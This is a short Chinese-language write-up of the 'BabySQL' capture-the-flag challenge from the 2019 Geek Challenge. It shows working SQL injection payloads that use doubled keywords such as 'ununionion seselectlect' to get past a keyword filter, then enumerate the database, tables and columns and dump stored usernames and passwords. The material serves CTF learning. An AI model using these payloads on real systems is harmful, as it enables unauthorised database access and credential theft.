[极客大挑战 2019]BabySQL 1
[极客大挑战 2019]BabySQL 1
审题
还是SQL注入和之前的是一个系列的。
知识点
联合注入,双写绕过
解题
-
输入万能密码
![image-20240303195246322]()
发现回显中没有or,猜测是使用正则过滤了or。
- 尝试双写绕过
登录成功
-
使用联合查询,本题中过滤了from,where,or ,by,union,select。
![image-20240303195737079]()
看到4没有注入点,2和3都有
-
输入
1'ununionion seselectlect 1,2,database()#爆出数据库
![image-20240303200429453]()
-
输入
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#得到类名
![image-20240303201245845]()
-
输入
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#得到表名
![image-20240303201453469]()
-
输入
1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#得到表的内容
浙公网安备 33010602011771号